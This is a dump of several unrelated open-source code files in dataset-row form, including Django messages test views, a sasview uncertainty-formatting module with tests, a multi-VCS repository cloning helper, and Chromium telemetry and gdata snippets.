repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
AltSchool/django | tests/messages_tests/urls.py | 56 | 2556 | from django import forms
from django.conf.urls import url
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.http import HttpResponse, HttpResponseRedirect
from django.template import engines
from django.template.response import TemplateResponse
from django.urls import reverse
from django.views.decorators.cache import never_cache
from django.views.generic.edit import FormView
# Template used by the show/show_template_response views below: renders any
# queued messages as an HTML list, tagging each <li> with the message tags.
TEMPLATE = """{% if messages %}
<ul class="messages">
{% for message in messages %}
<li{% if message.tags %} class="{{ message.tags }}"{% endif %}>
{{ message }}
</li>
{% endfor %}
</ul>
{% endif %}
"""
@never_cache
def add(request, message_type):
    """Queue each POSTed message at the level named by *message_type*,
    then redirect to the show view.

    ``fail_silently`` is only forwarded when it appears in the POST data.
    """
    # Deliberately no default of False here: the tests must exercise the
    # behaviour of the messages API when fail_silently is left unspecified.
    fail_silently = request.POST.get('fail_silently', None)
    add_message = getattr(messages, message_type)
    for text in request.POST.getlist('messages'):
        kwargs = {} if fail_silently is None else {'fail_silently': fail_silently}
        add_message(request, text, **kwargs)
    return HttpResponseRedirect(reverse('show_message'))
@never_cache
def add_template_response(request, message_type):
    """Queue each POSTed message at *message_type* level, then redirect
    to the TemplateResponse-based show view."""
    add_message = getattr(messages, message_type)
    for text in request.POST.getlist('messages'):
        add_message(request, text)
    return HttpResponseRedirect(reverse('show_template_response'))
@never_cache
def show(request):
    """Render any queued messages with TEMPLATE into a plain HttpResponse."""
    rendered = engines['django'].from_string(TEMPLATE).render(request=request)
    return HttpResponse(rendered)
@never_cache
def show_template_response(request):
    """Render any queued messages with TEMPLATE via a TemplateResponse."""
    return TemplateResponse(
        request, engines['django'].from_string(TEMPLATE))
class ContactForm(forms.Form):
    """Minimal form used to exercise SuccessMessageMixin; both fields are
    required so validation failures are easy to trigger."""
    name = forms.CharField(required=True)
    slug = forms.SlugField(required=True)
class ContactFormViewWithMsg(SuccessMessageMixin, FormView):
    """FormView that queues a success message when the form validates."""
    form_class = ContactForm
    # NOTE(review): success_url is normally a URL string but here is the
    # `show` view callable; presumably the mixin/FormView machinery coerces
    # it -- TODO confirm this is intentional in these tests.
    success_url = show
    success_message = "%(name)s was created successfully"
# URLconf wiring the message test views; the regex group captures the
# message level name (debug/info/success/warning/error).
urlpatterns = [
    url('^add/(debug|info|success|warning|error)/$', add, name='add_message'),
    url('^add/msg/$', ContactFormViewWithMsg.as_view(), name='add_success_msg'),
    url('^show/$', show, name='show_message'),
    url('^template_response/add/(debug|info|success|warning|error)/$',
        add_template_response, name='add_template_response'),
    url('^template_response/show/$', show_template_response, name='show_template_response'),
]
| bsd-3-clause |
timthelion/FreeCAD_sf_master | src/3rdParty/Pivy-0.5/gui/__init__.py | 38 | 1587 | ###
# Copyright (C) 2002-2005, Tamer Fahmy <tamer@tammura.at>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
| lgpl-2.1 |
lewisodriscoll/sasview | src/sas/sascalc/data_util/formatnum.py | 3 | 18970 | # This program is public domain
# Author: Paul Kienzle
"""
Format values and uncertainties nicely for printing.
:func:`format_uncertainty_pm` produces the expanded format v +/- err.
:func:`format_uncertainty_compact` produces the compact format v(##),
where the number in parenthesis is the uncertainty in the last two digits of v.
:func:`format_uncertainty` uses the compact format by default, but this
can be changed to use the expanded +/- format by setting
format_uncertainty.compact to False.
The formatted string uses only the number of digits warranted by
the uncertainty in the measurement.
If the uncertainty is 0 or not otherwise provided, the simple
%g floating point format option is used.
Infinite and indefinite numbers are represented as inf and NaN.
Example::
    >>> v, dv = 757.2356, 0.01032
    >>> print(format_uncertainty_pm(v, dv))
    757.236 +/- 0.010
    >>> print(format_uncertainty_compact(v, dv))
    757.236(10)
    >>> print(format_uncertainty(v, dv))
    757.236(10)
    >>> format_uncertainty.compact = False
    >>> print(format_uncertainty(v, dv))
    757.236 +/- 0.010
UncertaintyFormatter() returns a private formatter with its own
formatter.compact flag.
"""
from __future__ import division, print_function
import math
import numpy as np
__all__ = ['format_uncertainty', 'format_uncertainty_pm',
'format_uncertainty_compact']
# Coordinating scales across a set of numbers is not supported. For easy
# comparison a set of numbers should be shown in the same scale. One could
# force this from the outside by adding scale parameter (either 10**n, n, or
# a string representing the desired SI prefix) and having a separate routine
# which computes the scale given a set of values.
# Coordinating scales with units offers its own problems. Again, the user
# may want to force particular units. This can be done by outside of the
# formatting routines by scaling the numbers to the appropriate units then
# forcing them to print with scale 10**0. If this is a common operation,
# however, it may want to happen inside.
# The value e<n> is currently formatted into the number. Alternatively this
# scale factor could be returned so that the user can choose the appropriate
# SI prefix when printing the units. This gets tricky when talking about
# composite units such as 2.3e-3 m**2 -> 2300 mm**2, and with volumes
# such as 1 g/cm**3 -> 1 kg/L.
def format_uncertainty_pm(value, uncertainty):
    """
    Return the expanded string ``v +/- dv`` for *value* v and
    *uncertainty* dv.
    """
    return _format_uncertainty(value, uncertainty, False)
def format_uncertainty_compact(value, uncertainty):
    """
    Return the compact string ``v(##)`` for *value* v and *uncertainty*
    dv, where ## holds the first two digits of the uncertainty.
    """
    return _format_uncertainty(value, uncertainty, True)
class UncertaintyFormatter:
    """
    Value and uncertainty formatter.

    Each *formatter* instance renders either the compact ``v(##)`` form
    or the expanded ``v +/- dv`` form, selected by its *compact*
    attribute (True by default).
    """
    compact = True

    def __call__(self, value, uncertainty):
        """Return the string representation of *value* and *uncertainty*."""
        return _format_uncertainty(value, uncertainty, compact=self.compact)

# Shared default formatter; flip format_uncertainty.compact to change style.
format_uncertainty = UncertaintyFormatter()
def _format_uncertainty(value, uncertainty, compact):
"""
Implementation of both the compact and the +/- formats.
"""
# Handle indefinite value
if np.isinf(value):
return "inf" if value > 0 else "-inf"
if np.isnan(value):
return "NaN"
# Handle indefinite uncertainty
if uncertainty is None or uncertainty <= 0 or np.isnan(uncertainty):
return "%g" % value
if np.isinf(uncertainty):
if compact:
return "%.2g(inf)" % value
else:
return "%.2g +/- inf" % value
# Handle zero and negative values
sign = "-" if value < 0 else ""
value = abs(value)
# Determine scale of value and error
err_place = int(math.floor(math.log10(uncertainty)))
if value == 0:
val_place = err_place - 1
else:
val_place = int(math.floor(math.log10(value)))
if err_place > val_place:
# Degenerate case: error bigger than value
# The mantissa is 0.#(##)e#, 0.0#(##)e# or 0.00#(##)e#
val_place = err_place + 2
elif err_place == val_place:
# Degenerate case: error and value the same order of magnitude
# The value is ##(##)e#, #.#(##)e# or 0.##(##)e#
val_place = err_place + 1
elif err_place <= 1 and val_place >= -3:
# Normal case: nice numbers and errors
# The value is ###.###(##)
val_place = 0
else:
# Extreme cases: zeros before value or after error
# The value is ###.###(##)e#, ##.####(##)e# or #.#####(##)e#
pass
# Force engineering notation, with exponent a multiple of 3
val_place = int(math.floor(val_place / 3.)) * 3
# Format the result
digits_after_decimal = abs(val_place - err_place + 1)
val_str = "%.*f" % (digits_after_decimal, value / 10.**val_place)
exp_str = "e%d" % val_place if val_place != 0 else ""
if compact:
err_str = "(%2d)" % int(uncertainty / 10.**(err_place - 1) + 0.5)
result = "".join((sign, val_str, err_str, exp_str))
else:
err_str = "%.*f" % (digits_after_decimal, uncertainty / 10.**val_place)
result = "".join((sign, val_str, exp_str + " +/- ", err_str, exp_str))
return result
def test_compact():
    """Regression checks for the compact v(##) format across magnitudes,
    degenerate error/value ratios, zeros, negatives and non-finite input."""
    # Oops... renamed function after writing tests
    value_str = format_uncertainty_compact
    # val_place > err_place
    assert value_str(1235670,766000) == "1.24(77)e6"
    assert value_str(123567.,76600) == "124(77)e3"
    assert value_str(12356.7,7660) == "12.4(77)e3"
    assert value_str(1235.67,766) == "1.24(77)e3"
    assert value_str(123.567,76.6) == "124(77)"
    assert value_str(12.3567,7.66) == "12.4(77)"
    assert value_str(1.23567,.766) == "1.24(77)"
    assert value_str(.123567,.0766) == "0.124(77)"
    assert value_str(.0123567,.00766) == "0.0124(77)"
    assert value_str(.00123567,.000766) == "0.00124(77)"
    assert value_str(.000123567,.0000766) == "124(77)e-6"
    assert value_str(.0000123567,.00000766) == "12.4(77)e-6"
    assert value_str(.00000123567,.000000766) == "1.24(77)e-6"
    assert value_str(.000000123567,.0000000766) == "124(77)e-9"
    assert value_str(.00000123567,.0000000766) == "1.236(77)e-6"
    assert value_str(.0000123567,.0000000766) == "12.357(77)e-6"
    assert value_str(.000123567,.0000000766) == "123.567(77)e-6"
    assert value_str(.00123567,.000000766) == "0.00123567(77)"
    assert value_str(.0123567,.00000766) == "0.0123567(77)"
    assert value_str(.123567,.0000766) == "0.123567(77)"
    assert value_str(1.23567,.000766) == "1.23567(77)"
    assert value_str(12.3567,.00766) == "12.3567(77)"
    assert value_str(123.567,.0764) == "123.567(76)"
    assert value_str(1235.67,.764) == "1235.67(76)"
    assert value_str(12356.7,7.64) == "12356.7(76)"
    assert value_str(123567,76.4) == "123567(76)"
    assert value_str(1235670,764) == "1.23567(76)e6"
    assert value_str(12356700,764) == "12.35670(76)e6"
    assert value_str(123567000,764) == "123.56700(76)e6"
    assert value_str(123567000,7640) == "123.5670(76)e6"
    assert value_str(1235670000,76400) == "1.235670(76)e9"
    # val_place == err_place
    assert value_str(123567,764000) == "0.12(76)e6"
    assert value_str(12356.7,76400) == "12(76)e3"
    assert value_str(1235.67,7640) == "1.2(76)e3"
    assert value_str(123.567,764) == "0.12(76)e3"
    assert value_str(12.3567,76.4) == "12(76)"
    assert value_str(1.23567,7.64) == "1.2(76)"
    assert value_str(.123567,.764) == "0.12(76)"
    assert value_str(.0123567,.0764) == "12(76)e-3"
    assert value_str(.00123567,.00764) == "1.2(76)e-3"
    assert value_str(.000123567,.000764) == "0.12(76)e-3"
    # val_place == err_place-1
    assert value_str(123567,7640000) == "0.1(76)e6"
    assert value_str(12356.7,764000) == "0.01(76)e6"
    assert value_str(1235.67,76400) == "0.001(76)e6"
    assert value_str(123.567,7640) == "0.1(76)e3"
    assert value_str(12.3567,764) == "0.01(76)e3"
    assert value_str(1.23567,76.4) == "0.001(76)e3"
    assert value_str(.123567,7.64) == "0.1(76)"
    assert value_str(.0123567,.764) == "0.01(76)"
    assert value_str(.00123567,.0764) == "0.001(76)"
    assert value_str(.000123567,.00764) == "0.1(76)e-3"
    # val_place == err_place-2
    assert value_str(12356700,7640000000) == "0.0(76)e9"
    assert value_str(1235670,764000000) == "0.00(76)e9"
    assert value_str(123567,76400000) == "0.000(76)e9"
    assert value_str(12356,7640000) == "0.0(76)e6"
    assert value_str(1235,764000) == "0.00(76)e6"
    assert value_str(123,76400) == "0.000(76)e6"
    assert value_str(12,7640) == "0.0(76)e3"
    assert value_str(1,764) == "0.00(76)e3"
    assert value_str(0.1,76.4) == "0.000(76)e3"
    assert value_str(0.01,7.64) == "0.0(76)"
    assert value_str(0.001,0.764) == "0.00(76)"
    assert value_str(0.0001,0.0764) == "0.000(76)"
    assert value_str(0.00001,0.00764) == "0.0(76)e-3"
    # val_place == err_place-3
    assert value_str(12356700,76400000000) == "0.000(76)e12"
    assert value_str(1235670,7640000000) == "0.0(76)e9"
    assert value_str(123567,764000000) == "0.00(76)e9"
    assert value_str(12356,76400000) == "0.000(76)e9"
    assert value_str(1235,7640000) == "0.0(76)e6"
    assert value_str(123,764000) == "0.00(76)e6"
    assert value_str(12,76400) == "0.000(76)e6"
    assert value_str(1,7640) == "0.0(76)e3"
    assert value_str(0.1,764) == "0.00(76)e3"
    assert value_str(0.01,76.4) == "0.000(76)e3"
    assert value_str(0.001,7.64) == "0.0(76)"
    assert value_str(0.0001,0.764) == "0.00(76)"
    assert value_str(0.00001,0.0764) == "0.000(76)"
    assert value_str(0.000001,0.00764) == "0.0(76)e-3"
    # Zero values
    assert value_str(0,7640000) == "0.0(76)e6"
    assert value_str(0, 764000) == "0.00(76)e6"
    assert value_str(0, 76400) == "0.000(76)e6"
    assert value_str(0, 7640) == "0.0(76)e3"
    assert value_str(0, 764) == "0.00(76)e3"
    assert value_str(0, 76.4) == "0.000(76)e3"
    assert value_str(0, 7.64) == "0.0(76)"
    assert value_str(0, 0.764) == "0.00(76)"
    assert value_str(0, 0.0764) == "0.000(76)"
    assert value_str(0, 0.00764) == "0.0(76)e-3"
    assert value_str(0, 0.000764) == "0.00(76)e-3"
    assert value_str(0, 0.0000764) == "0.000(76)e-3"
    # negative values
    assert value_str(-1235670,765000) == "-1.24(77)e6"
    assert value_str(-1.23567,.766) == "-1.24(77)"
    assert value_str(-.00000123567,.0000000766) == "-1.236(77)e-6"
    assert value_str(-12356.7,7.64) == "-12356.7(76)"
    assert value_str(-123.567,764) == "-0.12(76)e3"
    assert value_str(-1235.67,76400) == "-0.001(76)e6"
    assert value_str(-.000123567,.00764) == "-0.1(76)e-3"
    assert value_str(-12356,7640000) == "-0.0(76)e6"
    assert value_str(-12,76400) == "-0.000(76)e6"
    assert value_str(-0.0001,0.764) == "-0.00(76)"
    # non-finite values
    assert value_str(-np.inf,None) == "-inf"
    assert value_str(np.inf,None) == "inf"
    assert value_str(np.NaN,None) == "NaN"
    # bad or missing uncertainty
    assert value_str(-1.23567,np.NaN) == "-1.23567"
    assert value_str(-1.23567,-np.inf) == "-1.23567"
    assert value_str(-1.23567,-0.1) == "-1.23567"
    assert value_str(-1.23567,0) == "-1.23567"
    assert value_str(-1.23567,None) == "-1.23567"
    assert value_str(-1.23567,np.inf) == "-1.2(inf)"
def test_pm():
    """Regression checks for the expanded v +/- dv format across magnitudes,
    degenerate error/value ratios, zeros, negatives and non-finite input."""
    # Oops... renamed function after writing tests
    value_str = format_uncertainty_pm
    # val_place > err_place
    assert value_str(1235670,766000) == "1.24e6 +/- 0.77e6"
    assert value_str(123567., 76600) == "124e3 +/- 77e3"
    assert value_str(12356.7, 7660) == "12.4e3 +/- 7.7e3"
    assert value_str(1235.67, 766) == "1.24e3 +/- 0.77e3"
    assert value_str(123.567, 76.6) == "124 +/- 77"
    assert value_str(12.3567, 7.66) == "12.4 +/- 7.7"
    assert value_str(1.23567, .766) == "1.24 +/- 0.77"
    assert value_str(.123567, .0766) == "0.124 +/- 0.077"
    assert value_str(.0123567, .00766) == "0.0124 +/- 0.0077"
    assert value_str(.00123567, .000766) == "0.00124 +/- 0.00077"
    assert value_str(.000123567, .0000766) == "124e-6 +/- 77e-6"
    assert value_str(.0000123567, .00000766) == "12.4e-6 +/- 7.7e-6"
    assert value_str(.00000123567, .000000766) == "1.24e-6 +/- 0.77e-6"
    assert value_str(.000000123567,.0000000766) == "124e-9 +/- 77e-9"
    assert value_str(.00000123567, .0000000766) == "1.236e-6 +/- 0.077e-6"
    assert value_str(.0000123567, .0000000766) == "12.357e-6 +/- 0.077e-6"
    assert value_str(.000123567, .0000000766) == "123.567e-6 +/- 0.077e-6"
    assert value_str(.00123567, .000000766) == "0.00123567 +/- 0.00000077"
    assert value_str(.0123567, .00000766) == "0.0123567 +/- 0.0000077"
    assert value_str(.123567, .0000766) == "0.123567 +/- 0.000077"
    assert value_str(1.23567, .000766) == "1.23567 +/- 0.00077"
    assert value_str(12.3567, .00766) == "12.3567 +/- 0.0077"
    assert value_str(123.567, .0764) == "123.567 +/- 0.076"
    assert value_str(1235.67, .764) == "1235.67 +/- 0.76"
    assert value_str(12356.7, 7.64) == "12356.7 +/- 7.6"
    assert value_str(123567, 76.4) == "123567 +/- 76"
    assert value_str(1235670, 764) == "1.23567e6 +/- 0.00076e6"
    assert value_str(12356700, 764) == "12.35670e6 +/- 0.00076e6"
    assert value_str(123567000, 764) == "123.56700e6 +/- 0.00076e6"
    assert value_str(123567000,7640) == "123.5670e6 +/- 0.0076e6"
    assert value_str(1235670000,76400) == "1.235670e9 +/- 0.000076e9"
    # val_place == err_place
    assert value_str(123567,764000) == "0.12e6 +/- 0.76e6"
    assert value_str(12356.7,76400) == "12e3 +/- 76e3"
    assert value_str(1235.67,7640) == "1.2e3 +/- 7.6e3"
    assert value_str(123.567,764) == "0.12e3 +/- 0.76e3"
    assert value_str(12.3567,76.4) == "12 +/- 76"
    assert value_str(1.23567,7.64) == "1.2 +/- 7.6"
    assert value_str(.123567,.764) == "0.12 +/- 0.76"
    assert value_str(.0123567,.0764) == "12e-3 +/- 76e-3"
    assert value_str(.00123567,.00764) == "1.2e-3 +/- 7.6e-3"
    assert value_str(.000123567,.000764) == "0.12e-3 +/- 0.76e-3"
    # val_place == err_place-1
    assert value_str(123567,7640000) == "0.1e6 +/- 7.6e6"
    assert value_str(12356.7,764000) == "0.01e6 +/- 0.76e6"
    assert value_str(1235.67,76400) == "0.001e6 +/- 0.076e6"
    assert value_str(123.567,7640) == "0.1e3 +/- 7.6e3"
    assert value_str(12.3567,764) == "0.01e3 +/- 0.76e3"
    assert value_str(1.23567,76.4) == "0.001e3 +/- 0.076e3"
    assert value_str(.123567,7.64) == "0.1 +/- 7.6"
    assert value_str(.0123567,.764) == "0.01 +/- 0.76"
    assert value_str(.00123567,.0764) == "0.001 +/- 0.076"
    assert value_str(.000123567,.00764) == "0.1e-3 +/- 7.6e-3"
    # val_place == err_place-2
    assert value_str(12356700,7640000000) == "0.0e9 +/- 7.6e9"
    assert value_str(1235670,764000000) == "0.00e9 +/- 0.76e9"
    assert value_str(123567,76400000) == "0.000e9 +/- 0.076e9"
    assert value_str(12356,7640000) == "0.0e6 +/- 7.6e6"
    assert value_str(1235,764000) == "0.00e6 +/- 0.76e6"
    assert value_str(123,76400) == "0.000e6 +/- 0.076e6"
    assert value_str(12,7640) == "0.0e3 +/- 7.6e3"
    assert value_str(1,764) == "0.00e3 +/- 0.76e3"
    assert value_str(0.1,76.4) == "0.000e3 +/- 0.076e3"
    assert value_str(0.01,7.64) == "0.0 +/- 7.6"
    assert value_str(0.001,0.764) == "0.00 +/- 0.76"
    assert value_str(0.0001,0.0764) == "0.000 +/- 0.076"
    assert value_str(0.00001,0.00764) == "0.0e-3 +/- 7.6e-3"
    # val_place == err_place-3
    assert value_str(12356700,76400000000) == "0.000e12 +/- 0.076e12"
    assert value_str(1235670,7640000000) == "0.0e9 +/- 7.6e9"
    assert value_str(123567,764000000) == "0.00e9 +/- 0.76e9"
    assert value_str(12356,76400000) == "0.000e9 +/- 0.076e9"
    assert value_str(1235,7640000) == "0.0e6 +/- 7.6e6"
    assert value_str(123,764000) == "0.00e6 +/- 0.76e6"
    assert value_str(12,76400) == "0.000e6 +/- 0.076e6"
    assert value_str(1,7640) == "0.0e3 +/- 7.6e3"
    assert value_str(0.1,764) == "0.00e3 +/- 0.76e3"
    assert value_str(0.01,76.4) == "0.000e3 +/- 0.076e3"
    assert value_str(0.001,7.64) == "0.0 +/- 7.6"
    assert value_str(0.0001,0.764) == "0.00 +/- 0.76"
    assert value_str(0.00001,0.0764) == "0.000 +/- 0.076"
    assert value_str(0.000001,0.00764) == "0.0e-3 +/- 7.6e-3"
    # Zero values
    assert value_str(0,7640000) == "0.0e6 +/- 7.6e6"
    assert value_str(0, 764000) == "0.00e6 +/- 0.76e6"
    assert value_str(0, 76400) == "0.000e6 +/- 0.076e6"
    assert value_str(0, 7640) == "0.0e3 +/- 7.6e3"
    assert value_str(0, 764) == "0.00e3 +/- 0.76e3"
    assert value_str(0, 76.4) == "0.000e3 +/- 0.076e3"
    assert value_str(0, 7.64) == "0.0 +/- 7.6"
    assert value_str(0, 0.764) == "0.00 +/- 0.76"
    assert value_str(0, 0.0764) == "0.000 +/- 0.076"
    assert value_str(0, 0.00764) == "0.0e-3 +/- 7.6e-3"
    assert value_str(0, 0.000764) == "0.00e-3 +/- 0.76e-3"
    assert value_str(0, 0.0000764) == "0.000e-3 +/- 0.076e-3"
    # negative values
    assert value_str(-1235670,766000) == "-1.24e6 +/- 0.77e6"
    assert value_str(-1.23567,.766) == "-1.24 +/- 0.77"
    assert value_str(-.00000123567,.0000000766) == "-1.236e-6 +/- 0.077e-6"
    assert value_str(-12356.7,7.64) == "-12356.7 +/- 7.6"
    assert value_str(-123.567,764) == "-0.12e3 +/- 0.76e3"
    assert value_str(-1235.67,76400) == "-0.001e6 +/- 0.076e6"
    assert value_str(-.000123567,.00764) == "-0.1e-3 +/- 7.6e-3"
    assert value_str(-12356,7640000) == "-0.0e6 +/- 7.6e6"
    assert value_str(-12,76400) == "-0.000e6 +/- 0.076e6"
    assert value_str(-0.0001,0.764) == "-0.00 +/- 0.76"
    # non-finite values
    assert value_str(-np.inf,None) == "-inf"
    assert value_str(np.inf,None) == "inf"
    assert value_str(np.NaN,None) == "NaN"
    # bad or missing uncertainty
    assert value_str(-1.23567,np.NaN) == "-1.23567"
    assert value_str(-1.23567,-np.inf) == "-1.23567"
    assert value_str(-1.23567,-0.1) == "-1.23567"
    assert value_str(-1.23567,0) == "-1.23567"
    assert value_str(-1.23567,None) == "-1.23567"
    assert value_str(-1.23567,np.inf) == "-1.2 +/- inf"
def test_default():
    """The module-level format_uncertainty defaults to the compact form."""
    # Check that the default is the compact format
    assert format_uncertainty(-1.23567,0.766) == "-1.24(77)"
def main():
    """
    Run all tests.

    This is equivalent to "nosetests --with-doctest"
    """
    test_compact()
    test_pm()
    test_default()
    # Run the examples embedded in the module docstring as well.
    import doctest
    doctest.testmod()

if __name__ == "__main__": main()
| bsd-3-clause |
strycore/readthecode | codereader/util.py | 1 | 1064 | import os
import subprocess
from bzrlib.plugin import load_plugins
from bzrlib.branch import Branch
from git import Git
def autodetect_vcs(url):
    """Guess the version control system from a repository URL.

    Returns 'hg', 'bzr' or 'git' when a known hosting site appears in
    *url*, and None when no known host matches.
    """
    # Order matters: checked in the same order as the original chain.
    hosts = (('bitbucket', 'hg'), ('launchpad', 'bzr'), ('github', 'git'))
    for marker, vcs in hosts:
        if marker in url:
            return vcs
    return None
def clone_git_repo(url, local_path):
    """Clone the git repository at *url* into *local_path* via GitPython."""
    Git(local_path).clone(url)
def clone_bzr_repo(url, local_path):
    # Clone a Bazaar branch from *url* into *local_path*.
    # load_plugins() must run before opening branches so that bzr's
    # transport plugins (http, lp:, ...) are registered.
    load_plugins()
    bzr_repo = Branch.open(url)
    # sprout() creates a copy of the branch at local_path; open_branch()
    # presumably forces materialization of the working branch -- TODO confirm.
    bzr_repo.bzrdir.sprout(local_path).open_branch()
def clone_hg_repo(url, local_path):
    """Clone the Mercurial repository at *url* into *local_path*.

    Blocks until the clone completes and raises
    subprocess.CalledProcessError if `hg clone` fails.  The previous
    Popen call returned immediately without waiting or checking the exit
    status, so callers could observe a missing or partial clone.
    """
    subprocess.check_call(['hg', 'clone', url, local_path])
def clone_repo(url, local_path, vcs='git'):
    """Clone the repository at *url* into *local_path*.

    *vcs* is one of 'git', 'bzr', 'hg', or 'autodetect' to guess the
    system from the URL.  Raises ValueError for an unknown vcs and
    OSError if *local_path* already exists (os.makedirs behaviour).
    """
    clone_functions = {
        'git': clone_git_repo,
        'bzr': clone_bzr_repo,
        'hg': clone_hg_repo,
    }
    if vcs == 'autodetect':
        vcs = autodetect_vcs(url)
    if vcs not in clone_functions:
        # Bug fix: the message and the joined list were previously passed
        # as two separate ValueError arguments, so the %s placeholder was
        # never interpolated (and the separator was the typo ' ,').
        raise ValueError('vcs argument must be one of %s'
                         % ', '.join(clone_functions))
    os.makedirs(local_path)
    clone_functions[vcs](url, local_path)
| agpl-3.0 |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/translations/model/hastranslationimports.py | 1 | 1245 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Model code for `IHasTranslationImports."""
__metaclass__ = type
__all__ = [
'HasTranslationImportsMixin',
]
from zope.component import getUtility
from lp.translations.interfaces.translationimportqueue import (
ITranslationImportQueue,
)
class HasTranslationImportsMixin:
    """Helper mixin implementing `IHasTranslationImports`."""

    def getFirstEntryToImport(self):
        """See `IHasTranslationImports`."""
        queue = getUtility(ITranslationImportQueue)
        return queue.getFirstEntryToImport(target=self)

    def getTranslationImportQueueEntries(self, import_status=None,
                                         file_extension=None):
        """See `IHasTranslationImports`."""
        # A single extension is wrapped in a list; None means "no filter".
        extensions = None if file_extension is None else [file_extension]
        queue = getUtility(ITranslationImportQueue)
        return queue.getAllEntries(
            target=self, import_status=import_status,
            file_extensions=extensions)
| agpl-3.0 |
s20121035/rk3288_android5.1_repo | external/chromium_org/tools/perf/page_sets/indexeddb_offline.py | 33 | 1888 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
def _CreateXpathFunction(xpath):
return ('document.evaluate("%s",'
'document,'
'null,'
'XPathResult.FIRST_ORDERED_NODE_TYPE,'
'null)'
'.singleNodeValue' % re.escape(xpath))
class IndexeddbOfflinePage(page_module.Page):
  """ Why: Simulates user input while offline and sync while online. """

  def __init__(self, page_set):
    super(IndexeddbOfflinePage, self).__init__(
        url='file://endure/indexeddb_app.html',
        page_set=page_set,
        name='indexeddb_offline')
    self.user_agent_type = 'desktop'

  def RunNavigateSteps(self, action_runner):
    # Navigate and wait for the test app to report it finished initializing.
    action_runner.NavigateToPage(self)
    action_runner.WaitForElement(text='initialized')

  def RunEndure(self, action_runner):
    # One endure iteration: switch the app online, wait until the page
    # reflects the online state, pause, then switch back offline and wait
    # for the offline state.  The :not(disabled) selectors ensure the
    # buttons are clickable before each click.
    action_runner.WaitForElement('button[id="online"]:not(disabled)')
    action_runner.ClickElement('button[id="online"]:not(disabled)')
    action_runner.WaitForElement(
        element_function=_CreateXpathFunction('id("state")[text()="online"]'))
    action_runner.Wait(1)
    action_runner.WaitForElement('button[id="offline"]:not(disabled)')
    action_runner.ClickElement('button[id="offline"]:not(disabled)')
    action_runner.WaitForElement(
        element_function=_CreateXpathFunction('id("state")[text()="offline"]'))
class IndexeddbOfflinePageSet(page_set_module.PageSet):
  """ Chrome Endure test for IndexedDB. """

  def __init__(self):
    super(IndexeddbOfflinePageSet, self).__init__(
        user_agent_type='desktop')
    # The set contains the single offline/online sync page defined above.
    self.AddPage(IndexeddbOfflinePage(self))
| gpl-3.0 |
alqfahad/odoo | addons/sale_analytic_plans/__init__.py | 443 | 1208 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#----------------------------------------------------------
# Init Sales
#----------------------------------------------------------
import sale_analytic_plans
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aslamplr/shorts | gdata/data.py | 127 | 39947 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
"""Provides classes and constants for the XML in the Google Data namespace.
Documentation for the raw XML which these classes represent can be found here:
http://code.google.com/apis/gdata/docs/2.0/elements.html
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import os
import atom.core
import atom.data
# Qualified-name templates for the GData/GD, OpenSearch and batch namespaces;
# each takes a local element name via %s.
GDATA_TEMPLATE = '{http://schemas.google.com/g/2005}%s'
GD_TEMPLATE = GDATA_TEMPLATE
OPENSEARCH_TEMPLATE_V1 = '{http://a9.com/-/spec/opensearchrss/1.0/}%s'
OPENSEARCH_TEMPLATE_V2 = '{http://a9.com/-/spec/opensearch/1.1/}%s'
